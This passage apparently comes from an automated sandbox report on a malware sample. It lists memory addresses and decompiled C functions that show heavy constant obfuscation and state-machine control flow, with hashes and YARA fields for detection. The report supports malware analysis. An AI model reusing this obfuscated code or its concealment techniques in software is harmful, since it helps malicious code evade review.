                                          0x006c5db8
                                          0x006c5dbc
                                          0x006c5dc4
                                          0x006c5dcc
                                          0x006c5dda
                                          0x006c5dde
                                          0x006c5de7
                                          0x006c5deb
                                          0x006c5df3
                                          0x006c5df7
                                          0x006c5e09
                                          0x006c5e66
                                          0x006c5e68
                                          0x006c5e6b
                                          0x006c5e71
                                          0x006c5f29
                                          0x00000000
                                          0x006c5e77
                                          0x006c5e77
                                          0x006c5e7d
                                          0x00000000
                                          0x006c5e83
                                          0x006c5e87
                                          0x006c5e89
                                          0x006c5e8d
                                          0x006c5e8f
                                          0x00000000
                                          0x006c5e91
                                          0x006c5e95
                                          0x006c5ea0
                                          0x006c5ea1
                                          0x006c5ea2
                                          0x006c5eab
                                          0x006c5eb1
                                          0x00000000
                                          0x006c5eb3
                                          0x006c5ec6
                                          0x006c5ed8
                                          0x006c5edd
                                          0x006c5edf
                                          0x006c5ee2
                                          0x006c5ee9
                                          0x006c5eec
                                          0x006c5ef0
                                          0x006c5ef4
                                          0x00000000
                                          0x006c5ef6
                                          0x00000000
                                          0x006c5ef6
                                          0x006c5ef4
                                          0x006c5eb1
                                          0x006c5e8f
                                          0x006c5e7d
                                          0x006c5e0b
                                          0x006c5e11
                                          0x006c5f00
                                          0x006c5f06
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x006c5e17
                                          0x006c5e1b
                                          0x006c5e28
                                          0x006c5e29
                                          0x006c5e2c
                                          0x006c5e31
                                          0x006c5e37
                                          0x006c5f0c
                                          0x006c5f0c
                                          0x006c5f12
                                          0x006c5f2d
                                          0x006c5f3a
                                          0x006c5f14
                                          0x006c5f14
                                          0x006c5f1a
                                          0x006c5f1c
                                          0x006c5f1c
                                          0x006c5e3d
                                          0x006c5e3d
                                          0x006c5e41
                                          0x006c5e43
                                          0x006c5e43
                                          0x006c5e47
                                          0x00000000
                                          0x006c5e47
                                          0x006c5e37
                                          0x006c5e11
                                          0x006c5f28
                                          0x006c5f28
                                          0x006c5efb
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: b-$bA$l'$z#
                                          • API String ID: 0-3285866504
                                          • Opcode ID: d6ffba5fd41fe7544c9f0c197747c63bcf5a9ecd6bc5aaba3b06836ed62c8ea0
                                          • Instruction ID: 1a35066992cb1f29e9cdf66b40c0185afab7dc04922a19557ba2ca3d3d02d476
                                          • Opcode Fuzzy Hash: d6ffba5fd41fe7544c9f0c197747c63bcf5a9ecd6bc5aaba3b06836ed62c8ea0
                                          • Instruction Fuzzy Hash: E4A120B15087819FD368CF69C88991FBBE2FBC4718F508A1DF59586260D3B4DA498F82
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006C80BA, Relevance: 5.1, Strings: 4, Instructions: 138COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 93%
                                          			E006C80BA(intOrPtr* __ecx, void* __edx, intOrPtr _a4, signed int* _a8) {
				char _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				unsigned int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				void* _t96;
				signed int _t110;
				signed int _t115;
				void* _t118;
				intOrPtr* _t132;
				signed int* _t133;
				signed int* _t136;

				_t133 = _a8;
				_push(_t133);
				_push(_a4);
				_t132 = __ecx;
				_push(__ecx);
				E006C602B(_t96);
				_v96 = 0xfd71;
				_t136 =  &(( &_v124)[4]);
				_v96 = _v96 >> 3;
				_v96 = _v96 ^ 0x00001ccd;
				_t118 = 0x30cb7a4b;
				_v120 = 0xdf4c;
				_t115 = 3;
				_v120 = _v120 * 0xb;
				_v120 = _v120 << 0xb;
				_v120 = _v120 ^ 0x4cc20427;
				_v100 = 0xc552;
				_v100 = _v100 << 1;
				_v100 = _v100 ^ 0x0001a6ce;
				_v124 = 0x18f9;
				_v124 = _v124 ^ 0xb394f6a4;
				_v124 = _v124 | 0xdedfeaf6;
				_v124 = _v124 ^ 0xffdfdfcb;
				_v104 = 0x111;
				_v104 = _v104 / _t115;
				_v104 = _v104 ^ 0x000052be;
				_v108 = 0x5c9e;
				_v108 = _v108 * 0x3f;
				_v108 = _v108 ^ 0x0016b186;
				_v112 = 0xa32c;
				_v112 = _v112 << 3;
				_v112 = _v112 >> 0xd;
				_v112 = _v112 ^ 0x000047d3;
				_v116 = 0x4558;
				_v116 = _v116 >> 0xb;
				_v116 = _v116 ^ 0x0dcfa8f2;
				_v116 = _v116 ^ 0x0dcf9328;
				_v92 = 0xa46a;
				_v92 = _v92 | 0x10f37349;
				_v92 = _v92 ^ 0x10f3c95f;
				_v80 = 0x75fc;
				_v80 = _v80 | 0x150fa2b7;
				_v80 = _v80 ^ 0x150fb0d6;
				_v84 = 0x120;
				_v84 = _v84 << 6;
				_v84 = _v84 ^ 0x00001616;
				_v88 = 0x286e;
				_v88 = _v88 * 0x36;
				_v88 = _v88 ^ 0x0008f8fa;
				do {
					while(_t118 != 0x75fb138) {
						if(_t118 == 0xe7893d9) {
							E006D360F( &_v76, _v112, _v116,  *_t132, _v92);
							_t136 =  &(_t136[3]);
							_t118 = 0x75fb138;
							continue;
						} else {
							if(_t118 == 0xf76409b) {
								_push(_t118);
								_push(_t118);
								_t110 = E006C8736(_t133[1]);
								 *_t133 = _t110;
								__eflags = _t110;
								if(__eflags != 0) {
									_t118 = 0x11f2e7ae;
									continue;
								}
							} else {
								if(_t118 == 0x11f2e7ae) {
									E006D50F2( &_v76, _v124, _v104, _v108, _t133);
									_t136 =  &(_t136[3]);
									_t118 = 0xe7893d9;
									continue;
								} else {
									if(_t118 == 0x25eae02b) {
										_t133[1] = E006D61B8(_t132);
										_t118 = 0xf76409b;
										continue;
									} else {
										if(_t118 != 0x30cb7a4b) {
											goto L14;
										} else {
											 *_t133 = 0;
											_t118 = 0x25eae02b;
											_t133[1] = 0;
											continue;
										}
									}
								}
							}
						}
						goto L15;
					}
					E006C7998(_v80, _v84, __eflags, _t132 + 4,  &_v76, _v88);
					_t136 =  &(_t136[3]);
					_t118 = 0x2f2a8f34;
					L14:
					__eflags = _t118 - 0x2f2a8f34;
				} while (__eflags != 0);
				L15:
				__eflags =  *_t133;
				_t95 =  *_t133 != 0;
				__eflags = _t95;
				return 0 | _t95;
			}























                                          0x006c80c0
                                          0x006c80c8
                                          0x006c80c9
                                          0x006c80d0
                                          0x006c80d3
                                          0x006c80d4
                                          0x006c80d9
                                          0x006c80e1
                                          0x006c80e4
                                          0x006c80eb
                                          0x006c80f3
                                          0x006c80f8
                                          0x006c810c
                                          0x006c810d
                                          0x006c8111
                                          0x006c8116
                                          0x006c811e
                                          0x006c8126
                                          0x006c812a
                                          0x006c8132
                                          0x006c813a
                                          0x006c8142
                                          0x006c814a
                                          0x006c8152
                                          0x006c8160
                                          0x006c8164
                                          0x006c816c
                                          0x006c8179
                                          0x006c817d
                                          0x006c8185
                                          0x006c818d
                                          0x006c8192
                                          0x006c8197
                                          0x006c819f
                                          0x006c81a7
                                          0x006c81ac
                                          0x006c81b4
                                          0x006c81bc
                                          0x006c81c4
                                          0x006c81cc
                                          0x006c81d4
                                          0x006c81dc
                                          0x006c81e4
                                          0x006c81ec
                                          0x006c81f4
                                          0x006c81f9
                                          0x006c8201
                                          0x006c820e
                                          0x006c8212
                                          0x006c821c
                                          0x006c821c
                                          0x006c822e
                                          0x006c82c8
                                          0x006c82cd
                                          0x006c82d0
                                          0x00000000
                                          0x006c8234
                                          0x006c823a
                                          0x006c829d
                                          0x006c829e
                                          0x006c82a2
                                          0x006c82a7
                                          0x006c82ab
                                          0x006c82ad
                                          0x006c82af
                                          0x00000000
                                          0x006c82af
                                          0x006c823c
                                          0x006c823e
                                          0x006c8282
                                          0x006c8287
                                          0x006c828a
                                          0x00000000
                                          0x006c8240
                                          0x006c8246
                                          0x006c8267
                                          0x006c826a
                                          0x00000000
                                          0x006c8248
                                          0x006c824e
                                          0x00000000
                                          0x006c8254
                                          0x006c8254
                                          0x006c8256
                                          0x006c825b
                                          0x00000000
                                          0x006c825b
                                          0x006c824e
                                          0x006c8246
                                          0x006c823e
                                          0x006c823a
                                          0x00000000
                                          0x006c822e
                                          0x006c82ef
                                          0x006c82f4
                                          0x006c82f7
                                          0x006c82fc
                                          0x006c82fc
                                          0x006c82fc
                                          0x006c8309
                                          0x006c830b
                                          0x006c830f
                                          0x006c830f
                                          0x006c8316

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: +%$+%$XE$n(
                                          • API String ID: 0-3838449085
                                          • Opcode ID: 3bf08974b850d916c8291a17b5ded16042347c14e7b4492625b9026cc2aeceda
                                          • Instruction ID: 207697ce0d82da4105cab81921b6e0a270cd26ec125e1f7b5913bf174911b15e
                                          • Opcode Fuzzy Hash: 3bf08974b850d916c8291a17b5ded16042347c14e7b4492625b9026cc2aeceda
                                          • Instruction Fuzzy Hash: 305144701097429FC358DF20D88986BBBE2FF94748F505A2DF58697260DBB58A49CF83
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006D8D1C, Relevance: 5.1, Strings: 4, Instructions: 123COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 96%
                                          			E006D8D1C(void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				void* _t108;
				intOrPtr _t110;
				intOrPtr _t120;
				signed int _t121;
				signed int _t122;
				signed int _t123;
				signed int _t124;
				intOrPtr _t127;
				intOrPtr _t128;
				intOrPtr _t144;
				intOrPtr* _t145;
				void* _t146;
				intOrPtr* _t147;

				_v36 = 0x4ef4;
				_v36 = _v36 + 0xa860;
				_v36 = _v36 | 0x1c77c6a8;
				_t121 = 0x2a;
				_v36 = _v36 / _t121;
				_v36 = _v36 ^ 0x00adf3e3;
				_v16 = 0xcfa4;
				_v16 = _v16 << 0xe;
				_v16 = _v16 ^ 0x33e94134;
				_v24 = 0x2a39;
				_v24 = _v24 ^ 0x66b190f2;
				_v24 = _v24 + 0x3fe;
				_v24 = _v24 ^ 0x66b19dc3;
				_v12 = 0x275a;
				_v12 = _v12 ^ 0xee83f1bc;
				_v12 = _v12 ^ 0xee83c69b;
				_v20 = 0x82c0;
				_v20 = _v20 | 0x74e44d6f;
				_v20 = _v20 ^ 0xeca8f7fc;
				_v20 = _v20 ^ 0x984c40be;
				_v32 = 0xcbb2;
				_v32 = _v32 ^ 0xf8a1ef7c;
				_t122 = 0x26;
				_v32 = _v32 / _t122;
				_v32 = _v32 ^ 0xc0a4f16a;
				_v32 = _v32 ^ 0xc62e2f9a;
				_v28 = 0xce4d;
				_t123 = 0x68;
				_v28 = _v28 / _t123;
				_t124 = 0xf;
				_v28 = _v28 / _t124;
				_v28 = _v28 ^ 0x15eb9a2e;
				_v28 = _v28 ^ 0x15ebc86f;
				_v4 = 0x1911;
				_v4 = _v4 ^ 0x7b1b0330;
				_v4 = _v4 ^ 0x7b1b2d08;
				_v8 = 0x92f;
				_v8 = _v8 >> 0xb;
				_v8 = _v8 ^ 0x00005602;
				_t108 = E006D85BA(_t124);
				_t144 = _a4;
				_t146 = _t108;
				_v36 = 0x94f3;
				_v36 = _v36 + 0xffff06f8;
				_v36 = _v36 | 0xf59d433d;
				_v36 = _v36 >> 0xe;
				_t148 = _t144 + 0x24;
				_v36 = _v36 ^ 0x0003ffff;
				_t120 = E006CE29C(_v16, _v24, _t144 + 0x24);
				_t110 =  *((intOrPtr*)(_t144 + 8));
				if(_t110 != _v36 && _t110 != _t146) {
					_t127 =  *((intOrPtr*)(_t144 + 0x18));
					if(_t127 != _v36 && _t127 != _t146) {
						_t145 = _a8;
						_t128 =  *_t145;
						if(E006D8D05(_t128, _t120) == 0) {
							_push(_t128);
							_push(_t128);
							_t147 = E006C8736(0x224);
							if(_t147 != 0) {
								_t95 = _t147 + 0xc; // 0xc
								E006C6636(_t95, _v28, _v4, _v8, _t148);
								 *_t147 = _t120;
								 *((intOrPtr*)(_t147 + 0x220)) =  *_t145;
								 *_t145 = _t147;
							}
						}
					}
				}
				return 1;
			}

























                                          0x006d8d1f
                                          0x006d8d28
                                          0x006d8d2f
                                          0x006d8d3f
                                          0x006d8d44
                                          0x006d8d4a
                                          0x006d8d52
                                          0x006d8d5a
                                          0x006d8d5f
                                          0x006d8d67
                                          0x006d8d6f
                                          0x006d8d77
                                          0x006d8d7f
                                          0x006d8d87
                                          0x006d8d8f
                                          0x006d8d97
                                          0x006d8d9f
                                          0x006d8da7
                                          0x006d8daf
                                          0x006d8db7
                                          0x006d8dbf
                                          0x006d8dc7
                                          0x006d8dd3
                                          0x006d8dd8
                                          0x006d8dde
                                          0x006d8de6
                                          0x006d8dee
                                          0x006d8dfa
                                          0x006d8dff
                                          0x006d8e09
                                          0x006d8e0c
                                          0x006d8e10
                                          0x006d8e18
                                          0x006d8e20
                                          0x006d8e28
                                          0x006d8e30
                                          0x006d8e38
                                          0x006d8e40
                                          0x006d8e45
                                          0x006d8e51
                                          0x006d8e56
                                          0x006d8e5a
                                          0x006d8e5c
                                          0x006d8e64
                                          0x006d8e6c
                                          0x006d8e74
                                          0x006d8e79
                                          0x006d8e7c
                                          0x006d8e92
                                          0x006d8e94
                                          0x006d8e9c
                                          0x006d8ea2
                                          0x006d8ea9
                                          0x006d8eaf
                                          0x006d8eb5
                                          0x006d8ebe
                                          0x006d8ecc
                                          0x006d8ecd
                                          0x006d8ed8
                                          0x006d8ede
                                          0x006d8ee5
                                          0x006d8ef0
                                          0x006d8ef5
                                          0x006d8efc
                                          0x006d8f02
                                          0x006d8f02
                                          0x006d8ede
                                          0x006d8ebe
                                          0x006d8ea9
                                          0x006d8f0e

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: /$4A3$9*$oMt
                                          • API String ID: 0-1186868077
                                          • Opcode ID: 661624ab906ed40de6bb00755b8a4da712f0a88c1636091944c630c3755a9822
                                          • Instruction ID: 393f964b6883458757db7fcd9af56027c940bc6d91a840ef48f5ecc470df2baa
                                          • Opcode Fuzzy Hash: 661624ab906ed40de6bb00755b8a4da712f0a88c1636091944c630c3755a9822
                                          • Instruction Fuzzy Hash: 805156716083429FD358CF26D48A90BFBE2FB98358F204A1DF48597260C7B4DA49CF86
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006C2A30, Relevance: 5.1, Strings: 4, Instructions: 108COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E006C2A30(intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				intOrPtr _v56;
				char _v60;
				char _v124;
				void* _t120;
				signed int _t130;
				signed int _t131;
				signed int _t132;
				intOrPtr _t146;

				_v12 = 0xa0d7;
				_v12 = _v12 + 0x7eb;
				_v12 = _v12 + 0xffff9690;
				_t130 = 0x70;
				_v12 = _v12 / _t130;
				_v12 = _v12 ^ 0x00005cb7;
				_v36 = 0xa6e2;
				_t131 = 0x7c;
				_t146 = _a4;
				_v36 = _v36 * 0x6c;
				_v36 = _v36 ^ 0x00462f2b;
				_v20 = 0xf5ce;
				_v20 = _v20 + 0xec5e;
				_v20 = _v20 | 0x882d1c6f;
				_v20 = _v20 ^ 0x882decee;
				_v8 = 0xef73;
				_v8 = _v8 * 0x50;
				_v8 = _v8 ^ 0x984778b6;
				_v8 = _v8 | 0x0acb781a;
				_v8 = _v8 ^ 0x9acfaccf;
				_v16 = 0xf20c;
				_t132 = 0x6d;
				_v16 = _v16 / _t131;
				_v16 = _v16 | 0x2a1cc570;
				_v16 = _v16 * 0x5c;
				_v16 = _v16 ^ 0x225769f1;
				_v28 = 0xd318;
				_v28 = _v28 / _t132;
				_v28 = _v28 ^ 0x955bcf9a;
				_v28 = _v28 ^ 0x955bcc47;
				_v40 = 0xc2b8;
				_v40 = _v40 + 0x609d;
				_v40 = _v40 ^ 0x00014342;
				_v24 = 0x21cc;
				_v24 = _v24 << 5;
				_v24 = _v24 << 0xa;
				_v24 = _v24 ^ 0x10e64576;
				_v48 = 0xc8ed;
				_v48 = _v48 + 0xffffe729;
				_v48 = _v48 ^ 0x00009812;
				_v32 = 0xdf82;
				_v32 = _v32 ^ 0xa0cf88d1;
				_v32 = _v32 >> 4;
				_v32 = _v32 ^ 0x0a0ce5c9;
				_v44 = 0xf2d1;
				_v44 = _v44 + 0x3831;
				_v44 = _v44 ^ 0x00011e20;
				_t120 =  *((intOrPtr*)(_t146 + 4))( *((intOrPtr*)(_t146 + 0x28)), 1, 0);
				_t149 = _t120;
				if(_t120 != 0) {
					E006D2349(_v12, _v36, _v20, _v8, _t132);
					_v60 =  &_v124;
					_v56 = E006CF85D(_v16, _t149,  &_v52, _v28, _v40, _v24);
					 *((intOrPtr*)(_t146 + 4))( *((intOrPtr*)(_t146 + 0x28)), 0xa,  &_v60,  &_v124);
					E006D2025(_v48, _v56, _v32, _v44);
				}
				return 0;
			}























                                          0x006c2a36
                                          0x006c2a3f
                                          0x006c2a46
                                          0x006c2a53
                                          0x006c2a58
                                          0x006c2a5d
                                          0x006c2a64
                                          0x006c2a6f
                                          0x006c2a72
                                          0x006c2a75
                                          0x006c2a78
                                          0x006c2a7f
                                          0x006c2a86
                                          0x006c2a8d
                                          0x006c2a94
                                          0x006c2a9b
                                          0x006c2aa6
                                          0x006c2aa9
                                          0x006c2ab0
                                          0x006c2ab7
                                          0x006c2abe
                                          0x006c2aca
                                          0x006c2acb
                                          0x006c2ad0
                                          0x006c2adf
                                          0x006c2ae2
                                          0x006c2ae9
                                          0x006c2af5
                                          0x006c2af8
                                          0x006c2aff
                                          0x006c2b06
                                          0x006c2b0d
                                          0x006c2b14
                                          0x006c2b1b
                                          0x006c2b22
                                          0x006c2b26
                                          0x006c2b2a
                                          0x006c2b31
                                          0x006c2b38
                                          0x006c2b3f
                                          0x006c2b46
                                          0x006c2b4d
                                          0x006c2b54
                                          0x006c2b58
                                          0x006c2b5f
                                          0x006c2b66
                                          0x006c2b6d
                                          0x006c2b77
                                          0x006c2b7a
                                          0x006c2b7c
                                          0x006c2b8f
                                          0x006c2b9d
                                          0x006c2bb2
                                          0x006c2bbe
                                          0x006c2bcd
                                          0x006c2bd3
                                          0x006c2bda

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: +/F$18$^$s
                                          • API String ID: 0-1171060364
                                          • Opcode ID: 70d39a78e3ab786549318ccb702bdfc1bcc7dde35113822f4650e37c684f7d3d
                                          • Instruction ID: 1822be48766ab5af6caaffe543bf94afc69ae410598fb25b4e02043e5daffdb3
                                          • Opcode Fuzzy Hash: 70d39a78e3ab786549318ccb702bdfc1bcc7dde35113822f4650e37c684f7d3d
                                          • Instruction Fuzzy Hash: 7451C472D0130AABEF08CFE1C94A9DEBBB6FB04314F208159D511B62A0D7B95A45DF94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006D73AC, Relevance: 4.0, Strings: 3, Instructions: 219COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 96%
                                          			E006D73AC() {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _t194;
				intOrPtr _t196;
				intOrPtr _t199;
				intOrPtr _t202;
				intOrPtr _t204;
				intOrPtr _t205;
				signed int _t207;
				signed int _t208;
				signed int _t209;
				signed int _t210;
				void* _t238;
				char _t242;
				signed int* _t243;
				void* _t245;

				_t243 =  &_v108;
				_v24 = 0x44d5d8;
				_t205 = 0;
				_v20 = 0;
				_v40 = 0x23cf;
				_v40 = _v40 ^ 0xbe38916f;
				_v40 = _v40 ^ 0xbe38820d;
				_v108 = 0x2e00;
				_v108 = _v108 + 0xe6b6;
				_v108 = _v108 * 0x5d;
				_t238 = 0x219f160f;
				_t207 = 0xe;
				_v108 = _v108 / _t207;
				_v108 = _v108 ^ 0x000708e5;
				_v56 = 0xac50;
				_t208 = 0x74;
				_v56 = _v56 / _t208;
				_v56 = _v56 ^ 0x00005612;
				_v48 = 0xf915;
				_v48 = _v48 + 0xc201;
				_v48 = _v48 ^ 0x0001bde6;
				_v76 = 0xa4d1;
				_v76 = _v76 << 0xb;
				_v76 = _v76 + 0x2090;
				_v76 = _v76 ^ 0x0526efdc;
				_v104 = 0x1331;
				_v104 = _v104 ^ 0x9278d736;
				_v104 = _v104 << 0xf;
				_v104 = _v104 << 3;
				_v104 = _v104 ^ 0x101c0c8f;
				_v52 = 0x4912;
				_t209 = 0x53;
				_v52 = _v52 * 0x5f;
				_v52 = _v52 ^ 0x001b11ba;
				_v80 = 0x36f7;
				_v80 = _v80 | 0x0c78674c;
				_v80 = _v80 + 0xffff3df1;
				_v80 = _v80 ^ 0x0c77a943;
				_v84 = 0x9f3a;
				_v84 = _v84 << 8;
				_v84 = _v84 ^ 0x7966a269;
				_v84 = _v84 ^ 0x79f9b7a1;
				_v60 = 0xac57;
				_v60 = _v60 ^ 0x3fa2bf2a;
				_v60 = _v60 ^ 0x3fa276dc;
				_v88 = 0xe218;
				_v88 = _v88 | 0xea5468c5;
				_v88 = _v88 << 0x10;
				_v88 = _v88 ^ 0xeadd1cb3;
				_v64 = 0x6c6b;
				_v64 = _v64 + 0xffff53e7;
				_v64 = _v64 ^ 0xffffd13f;
				_v92 = 0x6a88;
				_v92 = _v92 >> 1;
				_v92 = _v92 ^ 0xe005aace;
				_v92 = _v92 ^ 0xe005a166;
				_v100 = 0xd6b9;
				_v100 = _v100 ^ 0x5f91bbd5;
				_v100 = _v100 ^ 0x5ce69075;
				_v100 = _v100 >> 0xf;
				_v100 = _v100 ^ 0x00003faf;
				_v44 = 0xc8e7;
				_v44 = _v44 / _t209;
				_v44 = _v44 ^ 0x00005627;
				_v72 = 0xdbaa;
				_t210 = 0x49;
				_v72 = _v72 / _t210;
				_v72 = _v72 | 0xff4e0ba5;
				_v72 = _v72 ^ 0xff4e47cb;
				_v68 = 0x962f;
				_v68 = _v68 >> 0xe;
				_v68 = _v68 << 4;
				_v68 = _v68 ^ 0x00006f62;
				_v96 = 0xef5c;
				_t211 = 0x44;
				_v96 = _v96 * 0x25;
				_v96 = _v96 / _t211;
				_v96 = _v96 << 1;
				_v96 = _v96 ^ 0x0001262b;
				_t237 = _v36;
				_t242 = _v36;
				goto L1;
				do {
					while(1) {
						L1:
						_t245 = _t238 - 0x219f160f;
						if(_t245 > 0) {
							break;
						}
						if(_t245 == 0) {
							_t238 = 0x2394b362;
							continue;
						}
						if(_t238 == 0x8b9146f) {
							E006D9465(_v68, _t237, _v96);
							L23:
							return _t205;
						}
						if(_t238 == 0x93670d9) {
							_t194 = E006D340A(_v80,  &_v32, _v84,  &_v16);
							asm("sbb esi, esi");
							_pop(_t211);
							_t238 = ( ~_t194 & 0xf6f92468) + 0x24090f6a;
							continue;
						}
						if(_t238 == 0x155b4458) {
							_t196 = E006D89D3(_t242, _v108,  &_v36, _v56);
							_t237 = _t196;
							_pop(_t211);
							if(_t196 == 0) {
								goto L23;
							}
							_t238 = 0x35a1dc77;
							continue;
						}
						if(_t238 != 0x1b0233d2) {
							goto L20;
						} else {
							_t199 =  *0x6dca2c; // 0x248300
							E006D6128(_v60, _v88, _v12, _t199 + 0x230, _v64, _v92, _v8 + 1);
							_t202 =  *0x6dca2c; // 0x248300
							_t211 = _v16;
							_t243 =  &(_t243[5]);
							_t205 = 1;
							_t238 = 0x24090f6a;
							 *(_t202 + 0x450) = _v16;
							continue;
						}
					}
					if(_t238 == 0x2394b362) {
						_t242 = E006CF4D0(_t211);
						_t238 = 0x155b4458;
						goto L20;
					}
					if(_t238 == 0x24090f6a) {
						E006CF536(_v100, _v44, _v72, _v32);
						_pop(_t211);
						_t238 = 0x8b9146f;
						goto L1;
					}
					if(_t238 != 0x35a1dc77) {
						goto L20;
					}
					_t238 = 0x8b9146f;
					if(_v36 > 2) {
						_t211 = _v48;
						_t204 = E006CEA4C( *((intOrPtr*)(_t237 + 8)), _v76, _v104,  &_v28, _v52);
						_t243 =  &(_t243[4]);
						_v32 = _t204;
						if(_t204 != 0) {
							_t238 = 0x93670d9;
						}
					}
					goto L1;
					L20:
				} while (_t238 != 0x36620d3);
				goto L23;
			}











































                                          0x006d73ac
                                          0x006d73af
                                          0x006d73ba
                                          0x006d73bc
                                          0x006d73c0
                                          0x006d73c8
                                          0x006d73d0
                                          0x006d73d8
                                          0x006d73e0
                                          0x006d73f2
                                          0x006d73f6
                                          0x006d73ff
                                          0x006d7404
                                          0x006d740a
                                          0x006d7412
                                          0x006d741e
                                          0x006d7423
                                          0x006d7429
                                          0x006d7431
                                          0x006d7439
                                          0x006d7441
                                          0x006d7449
                                          0x006d7451
                                          0x006d7456
                                          0x006d745e
                                          0x006d7466
                                          0x006d746e
                                          0x006d7476
                                          0x006d747b
                                          0x006d7480
                                          0x006d7488
                                          0x006d7495
                                          0x006d7496
                                          0x006d749a
                                          0x006d74a2
                                          0x006d74aa
                                          0x006d74b2
                                          0x006d74ba
                                          0x006d74c2
                                          0x006d74ca
                                          0x006d74cf
                                          0x006d74d7
                                          0x006d74df
                                          0x006d74e7
                                          0x006d74ef
                                          0x006d74f7
                                          0x006d74ff
                                          0x006d7507
                                          0x006d750c
                                          0x006d7514
                                          0x006d751c
                                          0x006d7524
                                          0x006d752c
                                          0x006d7534
                                          0x006d7538
                                          0x006d7540
                                          0x006d7548
                                          0x006d7550
                                          0x006d7558
                                          0x006d7560
                                          0x006d7565
                                          0x006d756d
                                          0x006d757b
                                          0x006d757f
                                          0x006d7587
                                          0x006d7597
                                          0x006d759c
                                          0x006d75a2
                                          0x006d75aa
                                          0x006d75b2
                                          0x006d75ba
                                          0x006d75bf
                                          0x006d75c4
                                          0x006d75cc
                                          0x006d75d9
                                          0x006d75da
                                          0x006d75e4
                                          0x006d75e8
                                          0x006d75ec
                                          0x006d75f4
                                          0x006d75f8
                                          0x006d75f8
                                          0x006d75fc
                                          0x006d75fc
                                          0x006d75fc
                                          0x006d75fc
                                          0x006d7602
                                          0x00000000
                                          0x00000000
                                          0x006d7608
                                          0x006d76e2
                                          0x00000000
                                          0x006d76e2
                                          0x006d7614
                                          0x006d7793
                                          0x006d779c
                                          0x006d77a2
                                          0x006d77a2
                                          0x006d7620
                                          0x006d76c4
                                          0x006d76ce
                                          0x006d76d6
                                          0x006d76d7
                                          0x00000000
                                          0x006d76d7
                                          0x006d762c
                                          0x006d7698
                                          0x006d769d
                                          0x006d76a0
                                          0x006d76a3
                                          0x00000000
                                          0x00000000
                                          0x006d76a9
                                          0x00000000
                                          0x006d76a9
                                          0x006d7634
                                          0x00000000
                                          0x006d763a
                                          0x006d7648
                                          0x006d7662
                                          0x006d7667
                                          0x006d766e
                                          0x006d7675
                                          0x006d7678
                                          0x006d7679
                                          0x006d767e
                                          0x00000000
                                          0x006d767e
                                          0x006d7634
                                          0x006d76f2
                                          0x006d7774
                                          0x006d7776
                                          0x00000000
                                          0x006d7776
                                          0x006d76fa
                                          0x006d775a
                                          0x006d7760
                                          0x006d7761
                                          0x00000000
                                          0x006d7761
                                          0x006d7702
                                          0x00000000
                                          0x00000000
                                          0x006d7709
                                          0x006d770e
                                          0x006d7728
                                          0x006d772c
                                          0x006d7731
                                          0x006d7734
                                          0x006d773a
                                          0x006d7740
                                          0x006d7740
                                          0x006d773a
                                          0x00000000
                                          0x006d777b
                                          0x006d777b
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
